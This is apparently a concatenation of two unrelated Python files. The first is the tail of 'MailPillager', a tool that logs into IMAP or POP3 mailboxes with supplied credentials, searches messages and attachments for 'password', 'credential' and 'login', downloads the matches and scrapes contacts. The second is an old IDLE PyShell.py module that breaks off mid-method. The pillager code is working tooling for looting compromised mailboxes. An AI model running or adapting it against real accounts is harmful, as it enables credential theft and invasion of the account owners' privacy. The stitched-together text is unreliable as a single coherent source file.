self.getUIDs()
if (not self.uids):
return None
contacts = []
for uid in self.uids:
resp, data = self.srv.fetch(uid, "(RFC822)")
for response_part in data:
if isinstance(response_part, tuple):
msg = email.message_from_string(response_part[1].decode())
fromaddr = msg['from']
if (fromaddr):
sender = msg['from'].split()[-1]
address = re.sub(r'[<>]','',sender)
# Ignore any occurences of own email address and add to list
if not re.search(r'' + re.escape(self.user),address) and not address in contacts:
contacts.append(address)
print("IDENTIFED new contact [%s]" % (address))
return contacts
def getXsubjects(self, num=10):
if (not self.srv):
return
numMessages = self.srv.select(readonly=True)[1][0]
typ, data = self.getMessagesReverseOrder()
maxNum = num
if (int(numMessages) < int(num)):
maxNum = numMessages
i = 1
for num in data[0].split():
header = self.srv.fetch(num, '(BODY[HEADER])')
if (header):
header_data = header[1][0][1]
parser = email.parser.HeaderParser()
msg = parser.parsestr(header_data.decode())
print("#%i [%s] -> [%s]" %(i, msg['from'], msg['subject']))
i = i + 1
if (i > int(maxNum)):
return
return None
def getUIDs(self):
if (not self.srv):
return
if (not self.uids):
#get uids of all messages
self.srv.select(readonly=True)
result, data = self.srv.search(None, 'ALL')
self.uids = data[0].split()
def getMessagesReverseOrder(self, search_term='ALL'):
if (not self.srv):
return
self.srv.select(readonly=True)
sort_criteria = 'REVERSE DATE'
return self.srv.sort(sort_criteria, 'UTF-8', search_term)
def buildSearchTerm(self, part, terms):
if (not self.srv):
return
if (not part) or (not terms):
return
term_string = ""
i = 0
for term in terms:
temp = '(%s "%s")' % (part, term)
if (i > 0):
term_string = '(OR %s %s)' % (term_string, temp)
else:
term_string = temp
i = i + 1
return term_string
#-----------------------------------------------------------------------------
# IMAPS subclass of IMAP Class
#-----------------------------------------------------------------------------
class IMAPS(IMAP):
def __init__(self, outputdir="."):
IMAP.__init__(self, outputdir)
def connect(self, mailserver, port="993"):
self.mailserver = mailserver
self.port = port
try:
self.srv = imaplib.IMAP4_SSL(self.mailserver, self.port)
except:
self.srv = None
pass
#-----------------------------------------------------------------------------
# POP3 subclass of Pillager Class
#-----------------------------------------------------------------------------
class POP3(Pillager):
def __init__(self, outputdir="."):
Pillager.__init__(self, outputdir)
self.msg_list = None
def connect(self, mailserver, port="110"):
self.mailserver = mailserver
self.port = port
try:
self.srv = poplib.POP3(self.mailserver, self.port)
except:
self.srv = None
pass
def disconnect(self):
if (self.srv):
self.srv.quit()
def validate(self, user, password):
if (not self.srv):
return
self.user = user
self.password = password
try:
self.srv.user(self.user)
self.srv.pass_(self.password)
except poplib.error_proto as e:
return False
return True
def searchMessageBodies(self, term=None):
if (not self.srv):
return
if (not term):
return
self.getMessages()
matched = []
i = 1
for (server_msg, body, octets) in self.msg_list:
body = '\n'.join(body)
for search_term in term:
if re.search(search_term, body, re.IGNORECASE):
print("MATCHED ON [%s]" % (search_term))
if not i in matched:
matched.append(i)
i=i+1
return matched
def searchMessageSubjects(self, term=None):
if (not self.srv):
return
if (not term):
return
self.getMessages()
matched = []
i = 1
for (server_msg, body, octets) in self.msg_list:
msg = email.message_from_string('\n'.join(body))
for search_term in term:
if re.search(search_term, msg['subject'], re.IGNORECASE):
print("MATCHED ON [%s]" % (search_term))
if not i in matched:
matched.append(i)
i=i+1
return matched
def searchMessageAttachments(self, term=None):
if (not self.srv):
return
if (not term):
return
self.getMessages()
matched = []
i = 1
for (server_msg, body, octets) in self.msg_list:
msg = email.message_from_string('\n'.join(body))
# save attach
for part in msg.walk():
if part.get_content_maintype() == 'multipart':
continue
if part.get('Content-Disposition') is None:
continue
filename = part.get_filename()
if not(filename):
continue
for search_term in term:
if re.search(search_term, filename, re.IGNORECASE):
print("MATCHED ON [%s]" % (search_term))
if not i in matched:
matched.append(i)
i=i+1
return matched
def downloadMessage(self, messageid=None):
if (not self.srv):
return
if messageid:
(server_msg, body, octets) = self.srv.retr(messageid)
filename = self.user + "_" + str(messageid)
file_path = os.path.join(self.output_dir, filename)
print("Downloading message id [%s] to [%s]" % (messageid, file_path))
#Check if its already there
if not os.path.isfile(file_path) :
# finally write the stuff
fp = open(file_path, 'wb')
fp.write('\n'.join(body))
fp.close()
return None
def downloadAttachment(self, messageid=None):
if (not self.srv):
return
if (not messageid):
return
(server_msg, body, octets) = self.srv.retr(messageid)
msg = email.message_from_string('\n'.join(body))
# save attach
for part in msg.walk():
if part.get_content_maintype() == 'multipart':
continue
if part.get('Content-Disposition') is None:
continue
filename = part.get_filename()
if not(filename):
continue
file_path = os.path.join(self.output_dir, filename)
print("Downloading attachment [%s] to [%s]" % (messageid, file_path))
#Check if its already there
if not os.path.isfile(file_path) :
# finally write the stuff
fp = open(file_path, 'wb')
fp.write(part.get_payload(decode=True))
fp.close()
return None
def scrapeContacts(self):
if (not self.srv):
return
self.getMessages()
contacts = []
for (server_msg, body, octets) in self.msg_list:
mail = email.message_from_string('\n'.join(body))
for part in mail.walk():
fromaddr = part['from']
if (fromaddr):
sender = part['from'].split()[-1]
address = re.sub(r'[<>]','',sender)
# Ignore any occurences of own email address and add to list
if not re.search(r'' + re.escape(self.user),address) and not address in contacts:
contacts.append(address)
print("IDENTIFED new contact [%s]" % (address))
return contacts
def getXsubjects(self, num=10):
if (not self.srv):
return
self.getMessages()
for (server_msg, body, octets) in self.msg_list:
msg2 = email.message_from_string('\n'.join(body))
print("[%s] -> [%s]" %(msg2['from'], msg2['subject']))
def getMessages(self):
if (not self.srv):
return
if (not self.msg_list):
(numMsgs, totalSize) = self.srv.stat()
self.msg_list = []
for i in range(numMsgs):
self.msg_list.append(self.srv.retr(i+1))
#-----------------------------------------------------------------------------
# POP3S subclass of POP3 Class
#-----------------------------------------------------------------------------
class POP3S(POP3):
def __init__(self, outputdir="."):
POP3.__init__(self, outputdir)
def connect(self, mailserver, port="995"):
self.mailserver = mailserver
self.port = port
try:
self.srv = poplib.POP3_SSL(self.mailserver, self.port)
except:
self.srv = None
pass
#-----------------------------------------------------------------------------
# Wrapper Class
#-----------------------------------------------------------------------------
class MailPillager():
def tworker(self, mail_conn, username, password, domain, server, port):
valid = False
print("trying [%s]" % (username))
print("trying [%s@%s]" % (username, domain))
if (mail_conn.validate(username, password)):
valid = True
elif (mail_conn.validate(username+"@"+domain, password)):
valid = True
username = username+"@"+domain
if (valid):
print("USER [%s] with PASSWORD [%s] is valid on [%s:%i]" % (username, password, server, port))
matched_messages = []
matched_attachments = []
print("---------------Search Message Bodies [credential, account, password, login]")
matched_messages.extend(mail_conn.searchMessageBodies(term=["credential", "account", "password", "login"]))
print("---------------Search Message Subjects [credential, account, password, login]")
matched_messages.extend(mail_conn.searchMessageSubjects(term=["credential", "account", "password", "login"]))
print("---------------Search Message Attachments [credential, account, password, login]")
matched_attachments.extend(mail_conn.searchMessageAttachments(term=["credential", "account", "password", "login"]))
print("---------------Download Messages")
for uid in set(matched_messages):
mail_conn.downloadMessage(uid)
print("---------------Download Attachments")
for uid in set(matched_attachments):
mail_conn.downloadAttachment(uid)
print("---------------Scrape Contacts")
print(mail_conn.scrapeContacts())
print("---------------Get 10 Subjects")
print(mail_conn.getXsubjects())
print("---------------")
mail_conn.disconnect()
else:
print("USER [%s] with PASSWORD [%s] is NOT valid on [%s:%i]" % (username, password, server, port))
def pillage(self, username, password, server, port, domain, outputdir="."):
print("%s, %s, %s, %s" % (username, password, server, domain))
mail = None
if (port == 993):
mail = IMAPS(outputdir=outputdir)
elif (port == 143):
mail = IMAP(outputdir=outputdir)
elif (port == 995):
mail = POP3S(outputdir=outputdir)
elif (port == 110):
mail = POP3(outputdir=outputdir)
else:
print("ERROR, unknown port provided")
return
mail.connect(server)
t = Thread(target=self.tworker, args=(mail, username, password, domain, server, port,))
t.start()
#-----------------------------------------------------------------------------
# main test code
#-----------------------------------------------------------------------------
if __name__ == "__main__":
serverip = "x.x.x.x"
#username = "sjane@example.phish"
username = "user@domain.com"
password = "password"
domain = "domain.com"
mp = MailPillager()
# mp.pillage(username=username, password=password, server=serverip, port=143, domain=domain)
mp.pillage(username=username, password=password, server=serverip, port=993, domain=domain)
# mp.pillage(username=username, password=password, server=serverip, port=110, domain=domain)
# mp.pillage(username=username, password=password, server=serverip, port=995, domain=domain)
|
PyShell.py
|
#! /usr/bin/env python
import os
import os.path
import sys
import string
import getopt
import re
import socket
import time
import threading
import traceback
import types
import linecache
from code import InteractiveInterpreter
try:
from Tkinter import *
except ImportError:
print>>sys.__stderr__, "** IDLE can't import Tkinter. " \
"Your Python may not be configured for Tk. **"
sys.exit(1)
import tkMessageBox
from idlelib.EditorWindow import EditorWindow, fixwordbreaks
from idlelib.FileList import FileList
from idlelib.ColorDelegator import ColorDelegator
from idlelib.UndoDelegator import UndoDelegator
from idlelib.OutputWindow import OutputWindow
from idlelib.configHandler import idleConf
from idlelib import idlever
from idlelib import rpc
from idlelib import Debugger
from idlelib import RemoteDebugger
from idlelib import macosxSupport
IDENTCHARS = string.ascii_letters + string.digits + "_"
LOCALHOST = '127.0.0.1'
try:
from signal import SIGTERM
except ImportError:
SIGTERM = 15
# Override warnings module to write to warning_stream. Initialize to send IDLE
# internal warnings to the console. ScriptBinding.check_syntax() will
# temporarily redirect the stream to the shell window to display warnings when
# checking user's code.
global warning_stream
warning_stream = sys.__stderr__
try:
import warnings
except ImportError:
pass
else:
def idle_showwarning(message, category, filename, lineno,
file=None, line=None):
file = warning_stream
try:
file.write(warnings.formatwarning(message, category, filename,\
lineno, file=file, line=line))
except IOError:
pass ## file (probably __stderr__) is invalid, warning dropped.
warnings.showwarning = idle_showwarning
def idle_formatwarning(message, category, filename, lineno,
file=None, line=None):
"""Format warnings the IDLE way"""
s = "\nWarning (from warnings module):\n"
s += ' File \"%s\", line %s\n' % (filename, lineno)
line = linecache.getline(filename, lineno).strip() \
if line is None else line
if line:
s += " %s\n" % line
s += "%s: %s\n>>> " % (category.__name__, message)
return s
warnings.formatwarning = idle_formatwarning
def extended_linecache_checkcache(filename=None,
orig_checkcache=linecache.checkcache):
"""Extend linecache.checkcache to preserve the <pyshell#...> entries
Rather than repeating the linecache code, patch it to save the
<pyshell#...> entries, call the original linecache.checkcache()
(which destroys them), and then restore the saved entries.
orig_checkcache is bound at definition time to the original
method, allowing it to be patched.
"""
cache = linecache.cache
save = {}
for filename in cache.keys():
if filename[:1] + filename[-1:] == '<>':
save[filename] = cache[filename]
orig_checkcache()
cache.update(save)
# Patch linecache.checkcache():
linecache.checkcache = extended_linecache_checkcache
class PyShellEditorWindow(EditorWindow):
"Regular text edit window in IDLE, supports breakpoints"
def __init__(self, *args):
self.breakpoints = []
EditorWindow.__init__(self, *args)
self.text.bind("<<set-breakpoint-here>>", self.set_breakpoint_here)
self.text.bind("<<clear-breakpoint-here>>", self.clear_breakpoint_here)
self.text.bind("<<open-python-shell>>", self.flist.open_shell)
self.breakpointPath = os.path.join(idleConf.GetUserCfgDir(),
'breakpoints.lst')
# whenever a file is changed, restore breakpoints
if self.io.filename: self.restore_file_breaks()
def filename_changed_hook(old_hook=self.io.filename_change_hook,
self=self):
self.restore_file_breaks()
old_hook()
self.io.set_filename_change_hook(filename_changed_hook)
rmenu_specs = [("Set Breakpoint", "<<set-breakpoint-here>>"),
("Clear Breakpoint", "<<clear-breakpoint-here>>")]
def set_breakpoint(self, lineno):
text = self.text
filename = self.io.filename
text.tag_add("BREAK", "%d.0" % lineno, "%d.0" % (lineno+1))
try:
i = self.breakpoints.index(lineno)
except ValueError: # only add if missing, i.e. do once
self.breakpoints.append(lineno)
try: # update the subprocess debugger
debug = self.flist.pyshell.interp.debugger
debug.set_breakpoint_here(filename, lineno)
except: # but debugger may not be active right now....
pass
def set_breakpoint_here(self, event=None):
text = self.text
filename = self.io.filename
if not filename:
text.bell()
return
lineno = int(float(text.index("insert")))
self.set_breakpoint(lineno)
def clear_breakpoint_here(self, event=None):
text = self.text
filename = self.io.filename
if not filename:
text.bell()
return
lineno = int(float(text.index("insert")))
try:
self.breakpoints.remove(lineno)
except:
pass
text.tag_remove("BREAK", "insert linestart",\
"insert lineend +1char")
try:
debug = self.flist.pyshell.interp.debugger
debug.clear_breakpoint_here(filename, lineno)
except:
pass
def clear_file_breaks(self):
if self.breakpoints:
text = self.text
filename = self.io.filename
if not filename:
text.bell()
return
self.breakpoints = []
text.tag_remove("BREAK", "1.0", END)
try:
debug = self.flist.pyshell.interp.debugger
debug.clear_file_breaks(filename)
except:
pass
def store_file_breaks(self):
"Save breakpoints when file is saved"
# XXX 13 Dec 2002 KBK Currently the file must be saved before it can
# be run. The breaks are saved at that time. If we introduce
# a temporary file save feature the save breaks functionality
# needs to be re-verified, since the breaks at the time the
# temp file is created may differ from the breaks at the last
# permanent save of the file. Currently, a break introduced
# after a save will be effective, but not persistent.
# This is necessary to keep the saved breaks synched with the
# saved file.
#
# Breakpoints are set as tagged ranges in the text. Certain
# kinds of edits cause these ranges to be deleted: Inserting
# or deleting a line just before a breakpoint, and certain
# deletions prior to a breakpoint. These issues need to be
# investigated and understood. It's not clear if they are
# Tk issues or IDLE issues, or whether they can actually
# be fixed. Since a modified file has to be saved before it is
# run, and since self.breakpoints (from which the subprocess
# debugger is loaded) is updated during the save, the visible
# breaks stay synched with the subprocess even if one of these
# unexpected breakpoint deletions occurs.
breaks = self.breakpoints
filename = self.io.filename
try:
lines = open(self.breakpointPath,"r").readlines()
except IOError:
lines = []
new_file = open(self.breakpointPath,"w")
for line in lines:
if not line.startswith(filename + '='):
new_file.write(line)
self.update_breakpoints()
breaks = self.breakpoints
if breaks:
new_file.write(filename + '=' + str(breaks) + '\n')
new_file.close()
def restore_file_breaks(self):
self.text.update() # this enables setting "BREAK" tags to be visible
filename = self.io.filename
if filename is None:
return
if os.path.isfile(self.breakpointPath):
lines = open(self.breakpointPath,"r").readlines()
for line in lines:
if line.startswith(filename + '='):
breakpoint_linenumbers = eval(line[len(filename)+1:])
for breakpoint_linenumber in breakpoint_linenumbers:
self.set_breakpoint(breakpoint_linenumber)
def update_breakpoints(self):
"Retrieves all the breakpoints in the current window"
text = self.text
ranges = text.tag_ranges("BREAK")
linenumber_list = self.ranges_to_linenumbers(ranges)
self.breakpoints = linenumber_list
def ranges_to_linenumbers(self, ranges):
lines = []
for index in range(0, len(ranges), 2):
lineno = int(float(ranges[index]))
end = int(float(ranges[index+1]))
while lineno < end:
lines.append(lineno)
lineno += 1
return lines
# XXX 13 Dec 2002 KBK Not used currently
# def saved_change_hook(self):
# "Extend base method - clear breaks if module is modified"
# if not self.get_saved():
# self.clear_file_breaks()
# EditorWindow.saved_change_hook(self)
def _close(self):
"Extend base method - clear breaks when module is closed"
self.clear_file_breaks()
EditorWindow._close(self)
class PyShellFileList(FileList):
"Extend base class: IDLE supports a shell and breakpoints"
# override FileList's class variable, instances return PyShellEditorWindow
# instead of EditorWindow when new edit windows are created.
EditorWindow = PyShellEditorWindow
pyshell = None
def open_shell(self, event=None):
if self.pyshell:
self.pyshell.top.wakeup()
else:
self.pyshell = PyShell(self)
if self.pyshell:
if not self.pyshell.begin():
return None
return self.pyshell
class ModifiedColorDelegator(ColorDelegator):
"Extend base class: colorizer for the shell window itself"
def __init__(self):
ColorDelegator.__init__(self)
self.LoadTagDefs()
def recolorize_main(self):
self.tag_remove("TODO", "1.0", "iomark")
self.tag_add("SYNC", "1.0", "iomark")
ColorDelegator.recolorize_main(self)
def LoadTagDefs(self):
ColorDelegator.LoadTagDefs(self)
theme = idleConf.GetOption('main','Theme','name')
self.tagdefs.update({
"stdin": {'background':None,'foreground':None},
"stdout": idleConf.GetHighlight(theme, "stdout"),
"stderr": idleConf.GetHighlight(theme, "stderr"),
"console": idleConf.GetHighlight(theme, "console"),
})
class ModifiedUndoDelegator(UndoDelegator):
"Extend base class: forbid insert/delete before the I/O mark"
def insert(self, index, chars, tags=None):
try:
if self.delegate.compare(index, "<", "iomark"):
self.delegate.bell()
return
except TclError:
pass
UndoDelegator.insert(self, index, chars, tags)
def delete(self, index1, index2=None):
try:
if self.delegate.compare(index1, "<", "iomark"):
self.delegate.bell()
return
except TclError:
pass
UndoDelegator.delete(self, index1, index2)
class MyRPCClient(rpc.RPCClient):
def handle_EOF(self):
"Override the base class - just re-raise EOFError"
raise EOFError
class ModifiedInterpreter(InteractiveInterpreter):
def __init__(self, tkconsole):
self.tkconsole = tkconsole
locals = sys.modules['__main__'].__dict__
InteractiveInterpreter.__init__(self, locals=locals)
self.save_warnings_filters = None
self.restarting = False
self.subprocess_arglist = self.build_subprocess_arglist()
port = 8833
rpcclt = None
rpcpid = None
def spawn_subprocess(self):
args = self.subprocess_arglist
self.rpcpid = os.spawnv(os.P_NOWAIT, sys.executable, args)
def build_subprocess_arglist(self):
w = ['-W' + s for s in sys.warnoptions]
if 1/2 > 0: # account for new division
w.append('-Qnew')
# Maybe IDLE is installed and is being accessed via sys.path,
# or maybe it's not installed and the idle.py script is being
# run from the IDLE source directory.
del_exitf = idleConf.GetOption('main', 'General', 'delete-exitfunc',
default=False, type='bool')
if __name__ == 'idlelib.PyShell':
command = "__import__('idlelib.run').run.main(%r)" % (del_exitf,)
else:
command = "__import__('run').main(%r)" % (del_exitf,)
if sys.platform[:3] == 'win' and ' ' in sys.executable:
# handle embedded space in path by quoting the argument
decorated_exec = '"%s"' % sys.executable
else:
decorated_exec = sys.executable
return [decorated_exec] + w + ["-c", command, str(self.port)]
def start_subprocess(self):
# spawning first avoids passing a listening socket to the subprocess
self.spawn_subprocess()
#time.sleep(20) # test to simulate GUI not accepting connection
addr = (LOCALHOST, self.port)
# Idle starts listening for connection on localhost
for i in range(3):
time.sleep(i)
try:
self.rpcclt = MyRPCClient(addr)
break
except socket.error, err:
pass
else:
self.display_port_binding_error()
return None
# Accept the connection from the Python execution server
self.rpcclt.listening_sock.settimeout(10)
try:
self.rpcclt.accept()
except socket.timeout, err:
self.display_no_subprocess_error()
return None
self.rpcclt.register("stdin", self.tkconsole)
self.rpcclt.register("stdout", self.tkconsole.stdout)
self.rpcclt.register("stderr", self.tkconsole.stderr)
self.rpcclt.register("flist", self.tkconsole.flist)
self.rpcclt.register("linecache", linecache)
self.rpcclt.register("interp", self)
self.transfer_path()
self.poll_subprocess()
return self.rpcclt
def restart_subprocess(self):
if self.restarting:
return self.rpcclt
self.restarting = True
# close only the subprocess debugger
debug = self.getdebugger()
if debug:
try:
# Only close subprocess debugger, don't unregister gui_adap!
RemoteDebugger.close_subprocess_debugger(self.rpcclt)
except:
pass
# Kill subprocess, spawn a new one, accept connection.
self.rpcclt.close()
self.unix_terminate()
console = self.tkconsole
was_executing = console.executing
console.executing = False
self.spawn_subprocess()
try:
self.rpcclt.accept()
except socket.timeout, err:
self.display_no_subprocess_error()
return None
self.transfer_path()
# annotate restart in shell window and mark it
console.text.delete("iomark", "end-1c")
if was_executing:
console.write('\n')
console.showprompt()
halfbar = ((int(console.width) - 16) // 2) * '='
console.write(halfbar + ' RESTART ' + halfbar)
console.text.mark_set("restart", "end-1c")
console.text.mark_gravity("restart", "left")
console.showprompt()
# restart subprocess debugger
if debug:
# Restarted debugger connects to current instance of debug GUI
gui = RemoteDebugger.restart_subprocess_debugger(self.rpcclt)
# reload remote debugger breakpoints for all PyShellEditWindows
debug.load_breakpoints()
self.restarting = False
return self.rpcclt
def __request_interrupt(self):
self.rpcclt.remotecall("exec", "interrupt_the_server", (), {})
def interrupt_subprocess(self):
threading.Thread(target=self.__request_interrupt).start()
def kill_subprocess(self):
try:
self.rpcclt.close()
except AttributeError: # no socket
pass
self.unix_terminate()
self.tkconsole.executing = False
self.rpcclt = None
def unix_terminate(self):
"UNIX: make sure subprocess is terminated and collect status"
if hasattr(os, 'kill'):
try:
os.kill(self.rpcpid, SIGTERM)
except OSError:
# process already terminated:
return
else:
try:
os.waitpid(self.rpcpid, 0)
except OSError:
return
def transfer_path(self):
self.runcommand("""if 1:
import sys as _sys
_sys.path = %r
del _sys
\n""" % (sys.path,))
active_seq = None
def poll_subprocess(self):
clt = self.rpcclt
if clt is None:
return
try:
response = clt.pollresponse(self.active_seq, wait=0.05)
except (EOFError, IOError, KeyboardInterrupt):
# lost connection or subprocess terminated itself, restart
# [the KBI is from rpc.SocketIO.handle_EOF()]
if self.tkconsole.closing:
return
response = None
self.restart_subprocess()
if response:
self.tkconsole.resetoutput()
self.active_seq = None
how, what = response
console = self.tkconsole.console
if how == "OK":
if what is not None:
print >>console, repr(what)
elif how == "EXCEPTION":
if self.tkconsole.getvar("<<toggle-jit-stack-viewer>>"):
self.remote_stack_viewer()
elif how == "ERROR":
errmsg = "PyShell.ModifiedInterpreter: Subprocess ERROR:\n"
print >>sys.__stderr__, errmsg, what
print >>console, errmsg, what
# we received a response to the currently active seq number:
try:
self.tkconsole.endexecuting()
except AttributeError: # shell may have closed
pass
# Reschedule myself
if not self.tkconsole.closing:
self.tkconsole.text.after(self.tkconsole.pollinterval,
self.poll_subprocess)
debugger = None
def setdebugger(self, debugger):
self.debugger = debugger
def getdebugger(self):
return self.debugger
def open_remote_stack_viewer(self):
"""Initiate the remote stack viewer from a separate thread.
This method is called from the subprocess, and by returning from this
method we allow the subprocess to unblock. After a bit the shell
requests the subprocess to open the remote stack viewer which returns a
static object looking at the last exception. It is queried through
the RPC mechanism.
"""
self.tkconsole.text.after(300, self.remote_stack_viewer)
return
def remote_stack_viewer(self):
from idlelib import RemoteObjectBrowser
oid = self.rpcclt.remotequeue("exec", "stackviewer", ("flist",), {})
if oid is None:
self.tkconsole.root.bell()
return
item = RemoteObjectBrowser.StubObjectTreeItem(self.rpcclt, oid)
from idlelib.TreeWidget import ScrolledCanvas, TreeNode
top = Toplevel(self.tkconsole.root)
theme = idleConf.GetOption('main','Theme','name')
background = idleConf.GetHighlight(theme, 'normal')['background']
sc = ScrolledCanvas(top, bg=background, highlightthickness=0)
sc.frame.pack(expand=1, fill="both")
node = TreeNode(sc.canvas, None, item)
node.expand()
# XXX Should GC the remote tree when closing the window
gid = 0
def execsource(self, source):
"Like runsource() but assumes complete exec source"
filename = self.stuffsource(source)
self.execfile(filename, source)
def execfile(self, filename, source=None):
"Execute an existing file"
if source is None:
source = open(filename, "r").read()
try:
code = compile(source, filename, "exec")
except (OverflowError, SyntaxError):
self.tkconsole.resetoutput()
tkerr = self.tkconsole.stderr
print>>tkerr, '*** Error in script or command!\n'
print>>tkerr, 'Traceback (most recent call last):'
InteractiveInterpreter.showsyntaxerror(self, filename)
self.tkconsole.showprompt()
else:
self.runcode(code)
def runsource(self, source):
"Extend base class method: Stuff the source in the line cache first"
filename = self.stuffsource(source)
self.more = 0
self.save_warnings_filters = warnings.filters[:]
warnings.filterwarnings(action="error", category=SyntaxWarning)
if isinstance(source, types.UnicodeType):
from idlelib import IOBinding
try:
source = source.encode(IOBinding.encoding)
except UnicodeError:
self.tkconsole.resetoutput()
self.write("Unsupported characters in input\n")
return
try:
# InteractiveInterpreter.runsource() calls its runcode() method,
# which is overridden (see below)
return InteractiveInterpreter.runsource(self, source, filename)
finally:
if self.save_warnings_filters is not None:
warnings.filters[:] = self.save_warnings_filters
self.save_warnings_filters = None
def stuffsource(self, source):
"Stuff source in the filename cache"
filename = "<pyshell#%d>" % self.gid
self.gid = self.gid + 1
lines = source.split("\n")
linecache.cache[filename] = len(source)+1, 0, lines, filename
return filename
def prepend_syspath(self, filename):
"Prepend sys.path with file's directory if not already included"
self.runcommand("""if 1:
_filename = %r
import sys as _sys
from os.path import dirname as _dirname
_dir = _dirname(_filename)
if not _dir in _sys.path:
_sys.path.insert(0, _dir)
del _filename, _sys, _dirname, _dir
\n""" % (filename,))
def showsyntaxerror(self, filename=None):
"""Extend base class method: Add Colorizing
Color the offending position instead of printing it and pointing at it
with a caret.
"""
text = self.tkconsole.text
stuff = self.unpackerror()
if stuff:
msg, lineno, offset, line = stuff
if lineno == 1:
pos = "iomark + %d chars" % (offset-1)
else:
pos = "iomark linestart + %d lines + %d chars" % \
(lineno-1, offset-1)
text.tag_add("ERROR", pos)
text.see(pos)
char = text.get(pos)
if char and char in IDENTCHARS:
text.tag_add("ERROR", pos + " wordstart", pos)
self.tkconsole.resetoutput()
self.write("SyntaxError: %s\n" % str(msg))
else:
self.tkconsole.resetoutput()
InteractiveInterpreter.showsyntaxerror(self, filename)
self.tkconsole.showprompt()
def unpackerror(self):
type, value, tb = sys.exc_info()
ok = type is SyntaxError
if ok:
try:
msg, (dummy_filename, lineno, offset, line) = value
if not offset:
offset = 0
except:
ok = 0
if ok:
return msg, lineno, offset, line
else:
return None
def showtraceback(self):
"Extend base class method to reset output properly"
self.tkconsole.resetoutput()
self.checklinecache()
InteractiveInterpreter.showtraceback(self)
if self.tkconsole.getvar("<<toggle-jit-stack-viewer>>"):
self.tkconsole.open_stack_viewer()
def checklinecache(self):
c = linecache.cache
for key in c.keys():
if key[:1] + key[-1:] != "<>":
del c[key]
def runcommand(self, code):
"Run the code without invoking the debugger"
# The code better not raise an exception!
if self.tkconsole.executing:
self.display_executing_dialog()
return 0
if self.rpcclt:
self.rpcclt.remotequeue("exec", "runcode", (code,), {})
else:
exec code in self.locals
return 1
def runcode(self, code):
"Override base class method"
if self.tkconsole.executing:
self.interp.restart_subprocess()
self.checklinecache()
if self.save_warnings_filters is not None:
warnings.filters[:] = self.save_warnings_filters
self.save_warnings_filters = None
debugger = self.debugger
try:
self.tkconsole.beginexecuting()
if not debugger and self.rpcclt is not None:
self.active_seq = self.rpcclt.asyncqueue("exec", "runcode",
(code,), {})
elif debugger:
debugger.run(code, self.locals)
else:
exec code in self.locals
except SystemExit:
if not self.tkconsole.closing:
if tkMessageBox.askyesno(
"Exit?",
"Do you want to exit altogether?",
default="yes",
master=self.tkconsole.text):
raise
else:
self.showtraceback()
else:
raise
except:
if use_subprocess:
print >>self.tkconsole.stderr, \
"IDLE internal error in runcode()"
self.showtraceback()
self.tkconsole.endexecuting()
else:
if self.tkconsole.canceled:
self.tkconsole.canceled = False
print >>self.tkconsole.stderr, "KeyboardInterrupt"
else:
self.showtraceback()
finally:
if not use_subprocess:
try:
self.tkconsole.endexecuting()
except AttributeError: # shell may have closed
pass
def write(self, s):
"Override base class method"
self.tkconsole.stderr.write(s)
def display_port_binding_error(self):
tkMessageBox.showerror(
"Port Binding Error",
"IDLE can't bind TCP/IP port 8833, which is necessary to "
"communicate with its Python execution server. Either "
"no networking is installed on this computer or another "
"process (another IDLE?) is using the port. Run IDLE with the -n "
"command line switch to start without a subprocess and refer to "
"Help/IDLE Help 'Running without a subprocess' for further "
"details.",
master=self.tkconsole.text)
def display_no_subprocess_error(self):
tkMessageBox.showerror(
"Subprocess Startup Error",
"IDLE's subprocess didn't make connection. Either IDLE can't "
"start a subprocess or personal firewall software is blocking "
"the connection.",
master=self.tkconsole.text)
def display_executing_dialog(self):
tkMessageBox.showerror(
"Already executing",
"The Python Shell window is already executing a command; "
"please wait until it is finished.",
master=self.tkconsole.text)
class PyShell(OutputWindow):
shell_title = "Python Shell"
# Override classes
ColorDelegator = ModifiedColorDelegator
UndoDelegator = ModifiedUndoDelegator
# Override menus
menu_specs = [
("file", "_File"),
("edit", "_Edit"),
("debug", "_Debug"),
("options", "_Options"),
("windows", "_Windows"),
("help", "_Help"),
]
if macosxSupport.runningAsOSXApp():
del menu_specs[-3]
menu_specs[-2] = ("windows", "_Window")
# New classes
from idlelib.IdleHistory import History
def __init__(self, flist=None):
if use_subprocess:
ms = self.menu_specs
if ms[2][0] != "shell":
ms.insert(2, ("shell", "She_ll"))
self.interp = ModifiedInterpreter(self)
if flist is None:
root = Tk()
fixwordbreaks(root)
root.withdraw()
flist = PyShellFileList(root)
#
OutputWindow.__init__(self, flist, None, None)
#
## self.config(usetabs=1, indentwidth=8, context_use_ps1=1)
self.usetabs = True
# indentwidth must be 8 when using tabs. See note in EditorWindow:
self.indentwidth = 8
self.context_use_ps1 = True
#
text = self.text
text.configure(wrap="char")
text.bind("<<newline-and-indent>>", self.enter_callback)
text.bind("<<plain-newline-and-indent>>", self.linefeed_callback)
text.bind("<<interrupt-execution>>", self.cancel_callback)
text.bind("<<end-of-file>>", self.eof_callback)
text.bind("<<open-stack-viewer>>", self.open_stack_viewer)
text.bind("<<toggle-debugger>>", self.toggle_debugger)
text.bind("<<toggle-jit-stack-viewer>>", self.toggle_jit_stack_viewer)
if use_subprocess:
text.bind("<<view-restart>>", self.view_restart_mark)
text.bind("<<restart-shell>>", self.restart_shell)
#
self.save_stdout = sys.stdout
self.save_stderr = sys.stderr
self.save_stdin = sys.stdin
from idlelib import IOBinding
self.stdout = PseudoFile(self, "stdout", IOBinding.encoding)
self.stderr = PseudoFile(self, "stderr", IOBinding.encoding)
self.console = PseudoFile(self, "console", IOBinding.encoding)
if not use_subprocess:
sys.stdout = self.stdout
sys.stderr = self.stderr
sys.stdin = self
#
self.history = self.History(self.text)
#
self.pollinterval = 50 # millisec
def get_standard_extension_names(self):
return idleConf.GetExtensions(shell_only=True)
reading = False
executing = False
canceled = False
endoffile = False
closing = False
def set_warning_stream(self, stream):
global warning_stream
warning_stream = stream
def get_warning_stream(self):
return warning_stream
def toggle_debugger(self, event=None):
if self.executing:
tkMessageBox.showerror("Don't debug now",
"You can only toggle the debugger when idle",
master=self.text)
self.set_debugger_indicator()
return "break"
else:
db = self.interp.getdebugger()
if db:
self.close_debugger()
else:
self.open_debugger()
def set_debugger_indicator(self):
db = self.interp.getdebugger()
self.setvar("<<toggle-debugger>>", not not db)
def toggle_jit_stack_viewer(self, event=None):
pass # All we need is the variable
def close_debugger(self):
db = self.interp.getdebugger()
if db:
self.interp.setdebugger(None)
db.close()
if self.interp.rpcclt:
RemoteDebugger.close_remote_debugger(self.interp.rpcclt)
self.resetoutput()
self.console.write("[DEBUG OFF]\n")
sys.ps1 = ">>> "
self.showprompt()
self.set_debugger_indicator()
def open_debugger(self):
